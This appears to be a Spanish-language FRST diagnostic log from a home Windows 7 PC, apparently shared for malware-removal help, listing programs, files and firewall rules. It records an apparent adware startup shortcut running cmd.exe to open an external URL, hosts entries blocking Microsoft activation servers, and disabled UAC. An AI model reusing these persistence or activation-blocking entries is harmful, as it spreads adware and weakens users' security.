CHR Extension: (Documentos de Google sin conexión) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-12-08]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-12-08]
CHR Extension: (Gmail) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-12-08]
CHR Extension: (Chrome Media Router) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-08]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 2 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 3 [2018-11-24]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 5 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 6 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 7 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\System Profile [2018-11-24]
CHR HKLM\...\Chrome\Extension: [ibbfklbaljofpaanmpaeadejijfdddco]
CHR HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
==================== Servicios (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
S2 EpsonScanSvc; C:\Windows\system32\EscSvc.exe [122000 2011-12-12] (SEIKO EPSON Corporation -> Seiko Epson Corporation)
S2 EPSON_PM_RPCV4_05; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_JT50RP.EXE [142432 2012-02-27] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
===================== Controladores (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
S3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [27040 2017-03-02] (LogMeIn, Inc. -> LogMeIn, Inc.)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb.sys [22656 2007-05-14] (Microsoft Windows Hardware Compatibility Publisher -> Research In Motion Limited)
S3 RTL8167; C:\Windows\System32\DRIVERS\Rt86win7.sys [139776 2009-07-13] (Microsoft Windows -> Realtek Corporation )
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [128704 2016-08-16] (NGO -> MBB)
S3 fiddrv; no ImagePath
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 XDva511; \??\C:\Windows\system32\XDva511.sys [X]
==================== NetSvcs (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
==================== Un mes (creado) ===================
(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)
2020-04-22 11:47 - 2020-04-22 11:48 - 000020775 _____ C:\Users\Familia Landaeta\Desktop\FRST.txt
2020-04-22 10:38 - 2020-04-22 10:39 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Steam
2020-04-22 09:52 - 2020-04-22 11:41 - 000000000 ____D C:\Program Files\Steam
2020-04-22 09:52 - 2020-04-22 09:52 - 000000921 _____ C:\Users\Public\Desktop\Steam.lnk
2020-04-22 09:52 - 2020-04-22 09:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2020-04-22 09:52 - 2020-04-22 09:52 - 000000000 ____D C:\Program Files\Common Files\Steam
2020-04-22 03:14 - 2020-04-22 03:15 - 001573568 _____ C:\Users\Familia Landaeta\Downloads\steam-2020-01-17.exe
2020-04-21 10:16 - 2020-04-21 10:16 - 000002383 _____ C:\Users\Familia Landaeta\Desktop\Intel(R) Processor Identification Utility.lnk
2020-04-21 10:16 - 2020-04-21 10:16 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Caphyon
2020-04-21 10:15 - 2020-04-21 10:15 - 000000000 ____D C:\ProgramData\Package Cache
2020-04-21 09:52 - 2020-04-21 09:52 - 000000000 ____D C:\Program Files\Intel Corporation
2020-04-21 09:47 - 2020-04-21 09:52 - 021381072 _____ (Intel Corporation) C:\Users\Familia Landaeta\Downloads\Intel(R) Processor Identification Utility.exe
2020-04-21 08:51 - 2020-04-21 08:51 - 000001160 _____ C:\Users\Familia Landaeta\Desktop\Play UGGunz!.lnk
2020-04-21 00:25 - 2020-04-21 02:51 - 581405066 _____ C:\Users\Familia Landaeta\Downloads\gunzv10.exe
2020-04-20 18:29 - 2020-04-21 02:09 - 000000000 ____D C:\Users\Public\BlueStacks
2020-04-20 18:28 - 2020-04-21 20:25 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Bluestacks
2020-04-20 18:28 - 2020-04-20 18:28 - 000998072 _____ (BlueStack Systems Inc.) C:\Users\Familia Landaeta\Downloads\BlueStacksInstaller_4.190.0.5002_native_53674e065a3fa5d20ea925fe2672c89c.exe
2020-04-20 13:03 - 2020-04-20 13:04 - 000038958 _____ C:\Users\Familia Landaeta\Downloads\Addition.txt
2020-04-20 13:02 - 2020-04-20 13:04 - 000026632 _____ C:\Users\Familia Landaeta\Downloads\FRST.txt
2020-04-20 13:02 - 2020-04-20 13:02 - 000000300 ____H C:\Windows\Tasks\CCleaner Update.job
2020-04-20 13:01 - 2020-04-22 11:47 - 000000000 ____D C:\FRST
2020-04-20 13:00 - 2020-04-22 11:46 - 000270318 _____ C:\Windows\ntbtlog.txt
2020-04-20 12:20 - 2020-04-20 12:28 - 002009600 _____ (Farbar) C:\Users\Familia Landaeta\Desktop\FRST.exe
2020-04-20 08:59 - 2020-04-20 09:03 - 022267336 _____ (Piriform Software Ltd) C:\Users\Familia Landaeta\Downloads\ccsetup565 (1).exe
2020-04-19 18:31 - 2020-04-19 18:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Highresolution Enterprises
2020-04-19 18:31 - 2020-04-19 18:31 - 000000000 ____D C:\Program Files\Highresolution Enterprises
2020-04-19 18:28 - 2020-04-19 18:31 - 002713952 _____ C:\Users\Familia Landaeta\Downloads\x-mouse-button-control-2-19.exe
2020-04-17 11:34 - 2020-04-17 16:45 - 022267336 _____ (Piriform Software Ltd) C:\Users\Familia Landaeta\Downloads\ccsetup565.exe
2020-04-17 06:31 - 2020-04-17 06:31 - 000000000 _____ C:\Users\Familia Landaeta\AppData\Local\php.zip
2020-04-16 11:01 - 2020-04-16 15:58 - 000002238 _____ C:\Users\Public\Desktop\League of Legends.lnk
2020-04-16 10:38 - 2020-04-16 11:08 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Riot Games
2020-04-16 10:38 - 2020-04-16 11:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Riot Games
2020-04-16 10:38 - 2020-04-16 10:38 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Riot Games
2020-04-16 10:32 - 2020-04-16 19:09 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Riot Games
2020-04-16 10:03 - 2020-04-16 10:17 - 068993192 _____ (Riot Games, Inc.) C:\Users\Familia Landaeta\Downloads\Install League of Legends la1.exe
==================== Un mes (modificado) ==================
(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)
2020-04-22 11:46 - 2018-11-21 13:14 - 000252416 ___SH C:\Users\Familia Landaeta\Downloads\Thumbs.db
2020-04-22 11:45 - 2009-07-14 00:34 - 000022528 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-04-22 11:45 - 2009-07-14 00:34 - 000022528 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-04-22 11:41 - 2019-02-05 08:51 - 000000000 ___HD C:\Users\Familia Landaeta\AppData\Local\aoxfre
2020-04-22 11:41 - 2009-07-14 00:53 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-04-22 10:43 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\tracing
2020-04-22 03:08 - 2018-07-11 10:33 - 000000093 _____ C:\Windows\UGGLauncher.INI
2020-04-21 21:29 - 2019-02-05 08:42 - 000137216 ___SH C:\Users\Familia Landaeta\Desktop\Thumbs.db
2020-04-21 21:12 - 2016-09-12 11:35 - 000000000 ____D C:\Program Files\Google
2020-04-21 20:26 - 2016-09-12 11:35 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Google
2020-04-21 17:04 - 2016-09-12 11:42 - 000004050 _____ C:\Windows\system32\Tasks\User_Feed_Synchronization-{6BA31EE6-0E9C-4B23-991B-FCF4330E17DB}
2020-04-21 10:06 - 2010-11-20 20:30 - 000750824 _____ C:\Windows\system32\perfh00A.dat
2020-04-21 10:06 - 2010-11-20 20:30 - 000159866 _____ C:\Windows\system32\perfc00A.dat
2020-04-21 10:06 - 2010-11-20 17:01 - 001658694 _____ C:\Windows\system32\PerfStringBackup.INI
2020-04-21 10:06 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\inf
2020-04-21 08:51 - 2018-07-11 10:33 - 000001190 _____ C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play UGGunz!.lnk
2020-04-20 19:53 - 2016-09-12 11:46 - 000002168 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-04-20 15:45 - 2018-12-04 09:02 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Pendrive
2020-04-20 13:05 - 2016-10-17 10:44 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Games
2020-04-20 13:02 - 2018-11-19 11:24 - 000096768 ___SH C:\Users\Familia Landaeta\Documents\Thumbs.db
2020-04-19 11:25 - 2018-02-08 17:11 - 000004464 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2020-04-16 11:07 - 2016-09-21 12:10 - 000000000 ____D C:\ProgramData\Riot Games
2020-04-16 10:37 - 2018-03-13 00:16 - 000000000 ____D C:\Users\Familia Landaeta\Documents\Discord
2020-04-16 10:20 - 2016-09-12 11:35 - 000003524 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-04-16 10:20 - 2016-09-12 11:35 - 000003396 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-04-16 09:42 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\system32\NDF
2020-04-16 09:23 - 2019-04-13 03:35 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\ElevatedDiagnostics
2020-04-08 17:01 - 2017-01-22 15:53 - 000000000 ____D C:\Program Files\Counter-Strike 1.6
==================== Archivos en la raíz de algunos directorios ========
2020-04-17 06:31 - 2020-04-17 06:31 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\php.zip
2016-12-15 03:13 - 2016-12-15 03:14 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\{42A7229B-167F-4CEB-928F-88DF4E1A435E}
==================== SigCheck ============================
(No existe una corrección automática para los archivos que no pasan la verificación.)
LastRegBack: 2020-04-19 13:05
==================== Final de FRST.txt ========================Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x86) Versión: 19-04-2020
Ejecutado por Familia Landaeta (22-04-2020 11:48:17)
Ejecutado desde C:\Users\Familia Landaeta\Desktop
Microsoft Windows 7 Ultimate Service Pack 1 (X86) (2016-09-12 15:27:10)
Modo de Inicio: Safe Mode (minimal)
==========================================================
==================== Cuentas: =============================
Administrador (S-1-5-21-1692793609-910991690-2205039242-500 - Administrator - Disabled)
Familia Landaeta (S-1-5-21-1692793609-910991690-2205039242-1000 - Administrator - Enabled) => C:\Users\Familia Landaeta
HomeGroupUser$ (S-1-5-21-1692793609-910991690-2205039242-1002 - Limited - Enabled)
Invitado (S-1-5-21-1692793609-910991690-2205039242-501 - Limited - Disabled)
==================== Centro de Seguridad ========================
(Si una entrada es incluida en el fixlist, será eliminada.)
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programas instalados ======================
(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)
Adobe Acrobat Reader DC - Español (HKLM\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Akamai) (Version: - Akamai Technologies, Inc)
Cheating-Death 4.33.4 (HKLM\...\Cheating-Death) (Version: - )
Counter-Strike 1.6 (HKLM\...\Counter-Strike 1.6_is1) (Version: Counter-Strike 1.6 No Steam - KingSOFT DVD)
Epson E-Web Print (HKLM\...\{6BF9F374-EC67-4808-A90C-F127DE6D989D}) (Version: 1.23.0000 - SEIKO EPSON CORPORATION)
EPSON L355 Series Printer Uninstall (HKLM\...\EPSON L355 Series) (Version: - SEIKO EPSON Corporation)
EPSON Scan (HKLM\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
Epson Software Updater (HKLM\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
FIFA 14 versión 1.1 (HKLM\...\{A119D7FE-EF42-497D-A87A-C27F106E883E}_is1) (Version: 1.1 - )
Google Chrome (HKLM\...\Google Chrome) (Version: 81.0.4044.113 - Google LLC)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Hero Editor V0.96 (C:\Program Files\Hero Editor\) (HKLM\...\ST6UNST #2) (Version: - )
Hero Editor V0.96 (HKLM\...\ST6UNST #1) (Version: - )
Intel® Processor Identification Utility (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Utilidad Intel® para identificación de procesadores 6.3.0404) (Version: 6.3.0404 - Intel Corporation)
Java 8 Update 181 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
League of Legends (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Riot Game league_of_legends.live) (Version: - Riot Games, Inc)
Microsoft .NET Framework 4.6.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM\...\{402ED4A1-8F5B-387A-8688-997ABF58B8F2}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML4 Parser (HKLM\...\{01501EBA-EC35-4F9F-8889-3BE346E5DA13}) (Version: 1.0.0 - Microsoft Game Studios)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Utilidad Intel® para identificación de procesadores (HKLM\...\{285B6614-95B6-4F8E-BE81-CFAE1DB22D57}) (Version: 6.3.0404 - Intel Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 4.20 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
X-Mouse Button Control 2.19 (HKLM\...\X-Mouse Button Control) (Version: 2.19 - Highresolution Enterprises)
==================== Personalizado CLSID (Lista blanca): ==============
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
CustomCLSID: HKU\S-1-5-21-1692793609-910991690-2205039242-1000_Classes\CLSID\{305CA226-D286-468e-B848-2B2E8E697B74}\Shell\Open\Command -> C:\Users\Familia Landaeta\AppData\Local\Akamai\ControlPanel.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
ShellExecuteHooks: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2010-08-25] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]
==================== Codecs (Lista blanca) ====================
==================== Accesos directos & WMI ========================
(Las entradas pueden ser listadas para ser restauradas o eliminadas.)
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
ShortcutWithArgument: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c explorer hxxp://www2.savemax.store/
==================== Módulos cargados (Lista blanca) =============
2016-09-12 11:32 - 2012-06-09 19:50 - 000167936 _____ (Alexander Roshal) [Archivo no firmado] C:\Program Files\WinRAR\rarext.dll
2016-09-21 11:56 - 2016-09-21 11:56 - 000097280 _____ (Microsoft Corporation) [Archivo no firmado] C:\Windows\WinSxS\x86_microsoft.vc80.atl_1fc8b3b9a1e18e3b_8.0.50727.4053_none_d1c738ec43578ea1\ATL80.DLL
==================== Alternate Data Streams (Lista blanca) ========
==================== Modo Seguro (Lista blanca) ==================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"
==================== Asociación (Lista blanca) =================
==================== Internet Explorer sitios de confianza/restringidos ==========
(Si una entrada es incluida en el fixlist, será eliminada del registro.)
IE restricted site: HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\xnxx.com -> www.xnxx.com
==================== Hosts contenido: =========================
(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)
2009-07-13 22:04 - 2016-09-12 13:03 - 000000925 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 genuine.microsoft.com
127.0.0.1 mpa.one.microsoft.com
127.0.0.1 sls.microsoft.com
==================== Otras Áreas ===========================
(Actualmente no existe una corrección automática para esta sección.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: El medio no está conectado a internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==
==================== Reglas de firewall (Lista blanca) ================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
FirewallRules: [{1D304C31-0E0B-427B-A209-E245AA1DBA0E}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe Ningún archivo
FirewallRules: [TCP Query User{08E9F88E-7164-4C9B-A5E3-8425DF8A0747}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [UDP Query User{7C01576F-27B7-45E5-A1CE-685AAF5261B6}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [{F4D4EDBD-9721-405F-9C5A-4B95FD161921}] => (Allow) C:\Program Files\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{18C624E3-74F8-4BBF-B2EE-630BC42AB14A}] => (Allow) C:\Program Files\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{4C2EA450-FCEB-48E3-8469-496CA762A139}] => (Allow) E:\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{AC0AB0E1-512E-4FA0-AFB0-88FEAB7DBB8A}] => (Allow) E:\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [TCP Query User{B9206133-DE27-4228-95A7-0011F165747D}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [UDP Query User{7A9A70EE-3D37-4554-AF4F-88827A946410}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [TCP Query User{8A3C1318-8B40-403D-ACF7-237DA2AABC78}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [UDP Query User{C2F198D1-38BF-4B70-A00C-59073C44B99A}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [TCP Query User{BB6C1793-D505-4156-BF7C-44AA81CF0711}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [UDP Query User{E40546E9-EFB2-4C2E-9DD1-F46BA7C3EFF1}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [TCP Query User{51BC5DE6-434E-4374-927A-7C4B7F4D6E2E}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [UDP Query User{D83BA905-0A2E-4671-A098-AB513C5AF9C4}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [TCP Query User{7D14712A-D40E-4C4C-891B-7ECC745A6F20}C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [UDP Query User{E9CCF025-B6D4-49FE-8BB1-9DB454B02F51}C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [TCP Query User{30ED4585-638A-49AA-B805-1C77B86BEDDF}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [UDP Query User{D35A1BDA-FFEB-44E9-8347-220AE6105DAC}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [TCP Query User{1EAB70AF-D066-4767-ADCE-772024C20D56}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [UDP Query User{FB2593F0-E236-41D5-B4DC-0EF8ED94DD70}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [TCP Query User{557B22A5-A1E1-4091-9E9A-08198F3A48EB}C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [UDP Query User{A8614DE1-4000-47ED-8AA8-B4C20CD5091F}C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [TCP Query User{0492F1DA-2552-4AEE-B8DB-CB56494254CB}C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [UDP Query User{4696A47D-283B-43B6-88EE-31158FF5D770}C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [TCP Query User{51A1C049-CA80-46E3-B984-3CE89FF9413A}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Block) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [UDP Query User{43F840FA-25C1-4941-BB0F-9D9A51B666A0}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Block) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [TCP Query User{46EE030B-7A57-4E3F-AB8B-9F0DBB3110AC}C:\program files\counter-strike 1.6\hl.exe] => (Allow) C:\program files\counter-strike 1.6\hl.exe (Valve) [Archivo no firmado]
FirewallRules: [UDP Query User{D653C05C-F715-45BF-BE04-7DF15D930FA2}C:\program files\counter-strike 1.6\hl.exe] => (Allow) C:\program files\counter-strike 1.6\hl.exe (Valve) [Archivo no firmado]
FirewallRules: [{FBBEBCD5-A2F7-4A06-B4E0-1CC8755C1FE8}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{AFD82A99-09A1-40A0-AC23-23AEBAD196FE}C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe] => (Allow) C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe Ningún archivo
FirewallRules: [UDP Query User{533C26DC-9F35-4FC6-966D-68DEF983A7A8}C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe] => (Allow) C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe Ningún archivo
FirewallRules: [TCP Query User{09013516-0F08-4C86-89EC-792743B3C402}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [UDP Query User{C5723237-617D-487F-AA6B-1051735D0E52}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [TCP Query User{6183A9D7-F63B-4886-B59E-69A31228E3BC}C:\program files\java\jre1.8.0_121\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_121\bin\javaw.exe Ningún archivo
FirewallRules: [UDP Query User{54AE04C6-B40D-4130-979F-B531E5C8EDDF}C:\program files\java\jre1.8.0_121\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_121\bin\javaw.exe Ningún archivo
